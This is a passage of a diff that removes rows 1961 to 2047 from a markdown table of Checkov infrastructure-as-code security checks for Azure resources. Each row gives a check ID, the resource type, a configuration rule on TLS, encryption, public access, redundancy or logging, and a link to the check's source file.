-| 1961 | CKV_AZURE_204            | resource                         | azurerm_servicebus_namespace                                                                     | Ensure 'public network access enabled' is set to 'False' for Azure Service Bus                                                                                                                           | Terraform               | [AzureServicebusPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusPublicAccessDisabled.py)                                               |
-| 1962 | CKV_AZURE_205            | resource                         | azurerm_servicebus_namespace                                                                     | Ensure Azure Service Bus is using the latest version of TLS encryption                                                                                                                                   | Terraform               | [AzureServicebusMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusMinTLSVersion.py)                                                             |
-| 1963 | CKV_AZURE_206            | resource                         | azurerm_storage_account                                                                          | Ensure that Storage Accounts use replication                                                                                                                                                             | Terraform               | [StorageAccountsUseReplication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsUseReplication.py)                                                           |
-| 1964 | CKV_AZURE_207            | resource                         | azurerm_search_service                                                                           | Ensure Azure Cognitive Search service uses managed identities to access Azure resources                                                                                                                  | Terraform               | [AzureSearchManagedIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchManagedIdentity.py)                                                                 |
-| 1965 | CKV_AZURE_208            | resource                         | azurerm_search_service                                                                           | Ensure that Azure Cognitive Search maintains SLA for index updates                                                                                                                                       | Terraform               | [AzureSearchSLAIndex.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAIndex.py)                                                                               |
-| 1966 | CKV_AZURE_209            | resource                         | azurerm_search_service                                                                           | Ensure that Azure Cognitive Search maintains SLA for search index queries                                                                                                                                | Terraform               | [AzureSearchSLAQueryUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAQueryUpdates.py)                                                                 |
-| 1967 | CKV_AZURE_210            | resource                         | azurerm_search_service                                                                           | Ensure Azure Cognitive Search service allowed IPS does not give public Access                                                                                                                            | Terraform               | [AzureSearchAllowedIPsNotGlobal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchAllowedIPsNotGlobal.py)                                                         |
-| 1968 | CKV_AZURE_211            | resource                         | azurerm_service_plan                                                                             | Ensure App Service plan suitable for production use                                                                                                                                                      | Terraform               | [AppServiceSkuMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSkuMinimum.py)                                                                             |
-| 1969 | CKV_AZURE_212            | resource                         | azurerm_service_plan                                                                             | Ensure App Service has a minimum number of instances for failover                                                                                                                                        | Terraform               | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceInstanceMinimum.py)                                                                   |
-| 1970 | CKV_AZURE_213            | resource                         | azurerm_app_service                                                                              | Ensure that App Service configures health check                                                                                                                                                          | Terraform               | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py)                                                                     |
-| 1971 | CKV_AZURE_213            | resource                         | azurerm_linux_web_app                                                                            | Ensure that App Service configures health check                                                                                                                                                          | Terraform               | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py)                                                                     |
-| 1972 | CKV_AZURE_213            | resource                         | azurerm_windows_web_app                                                                          | Ensure that App Service configures health check                                                                                                                                                          | Terraform               | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py)                                                                     |
-| 1973 | CKV_AZURE_214            | resource                         | azurerm_linux_web_app                                                                            | Ensure App Service is set to be always on                                                                                                                                                                | Terraform               | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py)                                                                                 |
-| 1974 | CKV_AZURE_214            | resource                         | azurerm_windows_web_app                                                                          | Ensure App Service is set to be always on                                                                                                                                                                | Terraform               | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py)                                                                                 |
-| 1975 | CKV_AZURE_215            | resource                         | azurerm_api_management_backend                                                                   | Ensure API management backend uses https                                                                                                                                                                 | Terraform               | [APIManagementBackendHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementBackendHTTPS.py)                                                                   |
-| 1976 | CKV_AZURE_216            | resource                         | Microsoft.Network/azureFirewalls                                                                 | Ensure DenyIntelMode is set to Deny for Azure Firewalls                                                                                                                                                  | arm                     | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py)                                                                 |
-| 1977 | CKV_AZURE_216            | resource                         | Microsoft.Network/azureFirewalls                                                                 | Ensure DenyIntelMode is set to Deny for Azure Firewalls                                                                                                                                                  | Bicep                   | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py)                                                                 |
-| 1978 | CKV_AZURE_216            | resource                         | azurerm_firewall                                                                                 | Ensure DenyIntelMode is set to Deny for Azure Firewalls                                                                                                                                                  | Terraform               | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDenyThreatIntelMode.py)                                                     |
-| 1979 | CKV_AZURE_217            | resource                         | azurerm_application_gateway                                                                      | Ensure Azure Application gateways listener that allow connection requests over HTTP                                                                                                                      | Terraform               | [AppGWUsesHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUsesHttps.py)                                                                                         |
-| 1980 | CKV_AZURE_218            | resource                         | azurerm_application_gateway                                                                      | Ensure Application Gateway defines secure protocols for in transit communication                                                                                                                         | Terraform               | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWDefinesSecureProtocols.py)                                                               |
-| 1981 | CKV_AZURE_219            | resource                         | azurerm_firewall                                                                                 | Ensure Firewall defines a firewall policy                                                                                                                                                                | Terraform               | [AzureFirewallDefinesPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDefinesPolicy.py)                                                                 |
-| 1982 | CKV_AZURE_220            | resource                         | azurerm_firewall_policy                                                                          | Ensure Firewall policy has IDPS mode as deny                                                                                                                                                             | Terraform               | [AzureFirewallPolicyIDPSDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallPolicyIDPSDeny.py)                                                               |
-| 1983 | CKV_AZURE_221            | resource                         | azurerm_linux_function_app                                                                       | Ensure that Azure Function App public network access is disabled                                                                                                                                         | Terraform               | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py)                                                       |
-| 1984 | CKV_AZURE_221            | resource                         | azurerm_linux_function_app_slot                                                                  | Ensure that Azure Function App public network access is disabled                                                                                                                                         | Terraform               | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py)                                                       |
-| 1985 | CKV_AZURE_221            | resource                         | azurerm_windows_function_app                                                                     | Ensure that Azure Function App public network access is disabled                                                                                                                                         | Terraform               | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py)                                                       |
-| 1986 | CKV_AZURE_221            | resource                         | azurerm_windows_function_app_slot                                                                | Ensure that Azure Function App public network access is disabled                                                                                                                                         | Terraform               | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py)                                                       |
-| 1987 | CKV_AZURE_222            | resource                         | azurerm_linux_web_app                                                                            | Ensure that Azure Web App public network access is disabled                                                                                                                                              | Terraform               | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py)                                                         |
-| 1988 | CKV_AZURE_222            | resource                         | azurerm_windows_web_app                                                                          | Ensure that Azure Web App public network access is disabled                                                                                                                                              | Terraform               | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py)                                                         |
-| 1989 | CKV_AZURE_223            | resource                         | azurerm_eventhub_namespace                                                                       | Ensure Event Hub Namespace uses at least TLS 1.2                                                                                                                                                         | Terraform               | [EventHubNamespaceMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceMinTLS12.py)                                                                   |
-| 1990 | CKV_AZURE_224            | resource                         | azurerm_mssql_database                                                                           | Ensure that the Ledger feature is enabled on database that requires cryptographic proof and nonrepudiation of data integrity                                                                             | Terraform               | [SQLDatabaseLedgerEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseLedgerEnabled.py)                                                                     |
-| 1991 | CKV_AZURE_225            | resource                         | azurerm_service_plan                                                                             | Ensure the App Service Plan is zone redundant                                                                                                                                                            | Terraform               | [AppServicePlanZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePlanZoneRedundant.py)                                                               |
-| 1992 | CKV_AZURE_226            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure ephemeral disks are used for OS disks                                                                                                                                                             | Terraform               | [AKSEphemeralOSDisks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEphemeralOSDisks.py)                                                                               |
-| 1993 | CKV_AZURE_227            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources                                                                                             | Terraform               | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py)                                                                 |
-| 1994 | CKV_AZURE_227            | resource                         | azurerm_kubernetes_cluster_node_pool                                                             | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources                                                                                             | Terraform               | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py)                                                                 |
-| 1995 | CKV_AZURE_228            | resource                         | azurerm_eventhub_namespace                                                                       | Ensure the Azure Event Hub Namespace is zone redundant                                                                                                                                                   | Terraform               | [EventHubNamespaceZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceZoneRedundant.py)                                                         |
-| 1996 | CKV_AZURE_229            | resource                         | azurerm_mssql_database                                                                           | Ensure the Azure SQL Database Namespace is zone redundant                                                                                                                                                | Terraform               | [SQLDatabaseZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseZoneRedundant.py)                                                                     |
-| 1997 | CKV_AZURE_230            | resource                         | azurerm_redis_cache                                                                              | Standard Replication should be enabled                                                                                                                                                                   | Terraform               | [RedisCacheStandardReplicationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheStandardReplicationEnabled.py)                                             |
-| 1998 | CKV_AZURE_231            | resource                         | azurerm_app_service_environment_v3                                                               | Ensure App Service Environment is zone redundant                                                                                                                                                         | Terraform               | [AppServiceEnvironmentZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnvironmentZoneRedundant.py)                                                 |
-| 1999 | CKV_AZURE_232            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure that only critical system pods run on system nodes                                                                                                                                                | Terraform               | [AKSOnlyCriticalPodsOnSystemNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSOnlyCriticalPodsOnSystemNodes.py)                                                     |
-| 2000 | CKV_AZURE_233            | resource                         | azurerm_container_registry                                                                       | Ensure Azure Container Registry (ACR) is zone redundant                                                                                                                                                  | Terraform               | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableZoneRedundancy.py)                                                                       |
-| 2001 | CKV_AZURE_234            | resource                         | azurerm_security_center_subscription_pricing                                                     | Ensure that Azure Defender for cloud is set to On for Resource Manager                                                                                                                                   | Terraform               | [AzureDefenderDisabledForResManager.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderDisabledForResManager.py)                                                 |
-| 2002 | CKV_AZURE_235            | resource                         | azurerm_container_group                                                                          | Ensure that Azure container environment variables are configured with secure values only                                                                                                                 | Terraform               | [AzureContainerInstanceEnvVarSecureValueType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerInstanceEnvVarSecureValueType.py)                               |
-| 2003 | CKV_AZURE_236            | resource                         | Microsoft.Storage/storageAccounts                                                                | Ensure Storage Account is using the latest version of TLS encryption                                                                                                                                     | arm                     | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py)                                                                   |
-| 2004 | CKV_AZURE_236            | resource                         | Microsoft.Storage/storageAccounts                                                                | Ensure Storage Account is using the latest version of TLS encryption                                                                                                                                     | Bicep                   | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py)                                                                   |
-| 2005 | CKV2_AZURE_1             | resource                         | azurerm_storage_account                                                                          | Ensure storage for critical data are encrypted with Customer Managed Key                                                                                                                                 | Terraform               | [StorageCriticalDataEncryptedCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageCriticalDataEncryptedCMK.yaml)                                               |
-| 2006 | CKV2_AZURE_2             | resource                         | azurerm_mssql_server_security_alert_policy                                                       | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account                                                                                                        | Terraform               | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml)                                                       |
-| 2007 | CKV2_AZURE_2             | resource                         | azurerm_sql_server                                                                               | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account                                                                                                        | Terraform               | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml)                                                       |
-| 2008 | CKV2_AZURE_3             | resource                         | azurerm_mssql_server                                                                             | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server                                                                                                                               | Terraform               | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml)                                                               |
-| 2009 | CKV2_AZURE_3             | resource                         | azurerm_mssql_server_security_alert_policy                                                       | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server                                                                                                                               | Terraform               | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml)                                                               |
-| 2010 | CKV2_AZURE_3             | resource                         | azurerm_mssql_server_vulnerability_assessment                                                    | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server                                                                                                                               | Terraform               | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml)                                                               |
-| 2011 | CKV2_AZURE_3             | resource                         | azurerm_sql_server                                                                               | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server                                                                                                                               | Terraform               | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml)                                                               |
-| 2012 | CKV2_AZURE_4             | resource                         | azurerm_mssql_server                                                                             | Ensure Azure SQL server ADS VA Send scan reports to is configured                                                                                                                                        | Terraform               | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml)                                                           |
-| 2013 | CKV2_AZURE_4             | resource                         | azurerm_mssql_server_security_alert_policy                                                       | Ensure Azure SQL server ADS VA Send scan reports to is configured                                                                                                                                        | Terraform               | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml)                                                           |
-| 2014 | CKV2_AZURE_4             | resource                         | azurerm_mssql_server_vulnerability_assessment                                                    | Ensure Azure SQL server ADS VA Send scan reports to is configured                                                                                                                                        | Terraform               | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml)                                                           |
-| 2015 | CKV2_AZURE_4             | resource                         | azurerm_sql_server                                                                               | Ensure Azure SQL server ADS VA Send scan reports to is configured                                                                                                                                        | Terraform               | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml)                                                           |
-| 2016 | CKV2_AZURE_5             | resource                         | azurerm_mssql_server                                                                             | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server                                                                                         | Terraform               | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml)                                           |
-| 2017 | CKV2_AZURE_5             | resource                         | azurerm_mssql_server_security_alert_policy                                                       | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server                                                                                         | Terraform               | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml)                                           |
-| 2018 | CKV2_AZURE_5             | resource                         | azurerm_mssql_server_vulnerability_assessment                                                    | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server                                                                                         | Terraform               | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml)                                           |
-| 2019 | CKV2_AZURE_5             | resource                         | azurerm_sql_server                                                                               | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server                                                                                         | Terraform               | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml)                                           |
-| 2020 | CKV2_AZURE_6             | resource                         | azurerm_sql_firewall_rule                                                                        | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled                                                                                                                       | Terraform               | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml)                   |
-| 2021 | CKV2_AZURE_6             | resource                         | azurerm_sql_server                                                                               | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled                                                                                                                       | Terraform               | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml)                   |
-| 2022 | CKV2_AZURE_7             | resource                         | azurerm_sql_server                                                                               | Ensure that Azure Active Directory Admin is configured                                                                                                                                                   | Terraform               | [AzureActiveDirectoryAdminIsConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureActiveDirectoryAdminIsConfigured.yaml)                                   |
-| 2023 | CKV2_AZURE_8             | resource                         | azurerm_monitor_activity_log_alert                                                               | Ensure the storage container storing the activity logs is not publicly accessible                                                                                                                        | Terraform               | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml)                                   |
-| 2024 | CKV2_AZURE_8             | resource                         | azurerm_storage_account                                                                          | Ensure the storage container storing the activity logs is not publicly accessible                                                                                                                        | Terraform               | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml)                                   |
-| 2025 | CKV2_AZURE_8             | resource                         | azurerm_storage_container                                                                        | Ensure the storage container storing the activity logs is not publicly accessible                                                                                                                        | Terraform               | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml)                                   |
-| 2026 | CKV2_AZURE_9             | resource                         | azurerm_virtual_machine                                                                          | Ensure Virtual Machines are utilizing Managed Disks                                                                                                                                                      | Terraform               | [VirtualMachinesUtilizingManagedDisks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VirtualMachinesUtilizingManagedDisks.yaml)                                     |
-| 2027 | CKV2_AZURE_10            | resource                         | azurerm_virtual_machine                                                                          | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines                                                                                                            | Terraform               | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml)           |
-| 2028 | CKV2_AZURE_10            | resource                         | azurerm_virtual_machine_extension                                                                | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines                                                                                                            | Terraform               | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml)           |
-| 2029 | CKV2_AZURE_11            | resource                         | azurerm_kusto_cluster                                                                            | Ensure that Azure Data Explorer encryption at rest uses a customer-managed key                                                                                                                           | Terraform               | [DataExplorerEncryptionUsesCustomKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DataExplorerEncryptionUsesCustomKey.yaml)                                       |
-| 2030 | CKV2_AZURE_12            | resource                         | azurerm_virtual_machine                                                                          | Ensure that virtual machines are backed up using Azure Backup                                                                                                                                            | Terraform               | [VMHasBackUpMachine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VMHasBackUpMachine.yaml)                                                                         |
-| 2031 | CKV2_AZURE_13            | resource                         | azurerm_mssql_server_security_alert_policy                                                       | Ensure that sql servers enables data security policy                                                                                                                                                     | Terraform               | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml)                                 |
-| 2032 | CKV2_AZURE_13            | resource                         | azurerm_sql_server                                                                               | Ensure that sql servers enables data security policy                                                                                                                                                     | Terraform               | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml)                                 |
-| 2033 | CKV2_AZURE_14            | resource                         | azurerm_managed_disk                                                                             | Ensure that Unattached disks are encrypted                                                                                                                                                               | Terraform               | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml)                                             |
-| 2034 | CKV2_AZURE_14            | resource                         | azurerm_virtual_machine                                                                          | Ensure that Unattached disks are encrypted                                                                                                                                                               | Terraform               | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml)                                             |
-| 2035 | CKV2_AZURE_15            | resource                         | azurerm_data_factory                                                                             | Ensure that Azure data factories are encrypted with a customer-managed key                                                                                                                               | Terraform               | [AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml)           |
-| 2036 | CKV2_AZURE_16            | resource                         | azurerm_mysql_server                                                                             | Ensure that MySQL server enables customer-managed key for encryption                                                                                                                                     | Terraform               | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml)                                                   |
-| 2037 | CKV2_AZURE_16            | resource                         | azurerm_mysql_server_key                                                                         | Ensure that MySQL server enables customer-managed key for encryption                                                                                                                                     | Terraform               | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml)                                                   |
-| 2038 | CKV2_AZURE_17            | resource                         | azurerm_postgresql_server                                                                        | Ensure that PostgreSQL server enables customer-managed key for encryption                                                                                                                                | Terraform               | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml)                                                 |
-| 2039 | CKV2_AZURE_17            | resource                         | azurerm_postgresql_server_key                                                                    | Ensure that PostgreSQL server enables customer-managed key for encryption                                                                                                                                | Terraform               | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml)                                                 |
-| 2040 | CKV2_AZURE_19            | resource                         | azurerm_synapse_workspace                                                                        | Ensure that Azure Synapse workspaces have no IP firewall rules attached                                                                                                                                  | Terraform               | [AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml)       |
-| 2041 | CKV2_AZURE_20            | resource                         | azurerm_log_analytics_storage_insights                                                           | Ensure Storage logging is enabled for Table service for read requests                                                                                                                                    | Terraform               | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml)                                 |
-| 2042 | CKV2_AZURE_20            | resource                         | azurerm_storage_account                                                                          | Ensure Storage logging is enabled for Table service for read requests                                                                                                                                    | Terraform               | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml)                                 |
-| 2043 | CKV2_AZURE_20            | resource                         | azurerm_storage_table                                                                            | Ensure Storage logging is enabled for Table service for read requests                                                                                                                                    | Terraform               | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml)                                 |
-| 2044 | CKV2_AZURE_21            | resource                         | azurerm_log_analytics_storage_insights                                                           | Ensure Storage logging is enabled for Blob service for read requests                                                                                                                                     | Terraform               | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml)                                   |
-| 2045 | CKV2_AZURE_21            | resource                         | azurerm_storage_account                                                                          | Ensure Storage logging is enabled for Blob service for read requests                                                                                                                                     | Terraform               | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml)                                   |
-| 2046 | CKV2_AZURE_21            | resource                         | azurerm_storage_container                                                                        | Ensure Storage logging is enabled for Blob service for read requests                                                                                                                                     | Terraform               | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml)                                   |
-| 2047 | CKV2_AZURE_22            | resource                         | azurerm_cognitive_account                                                                        | Ensure that Cognitive Services enables customer-managed key for encryption                                                                                                                               | Terraform               | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml)                                       |
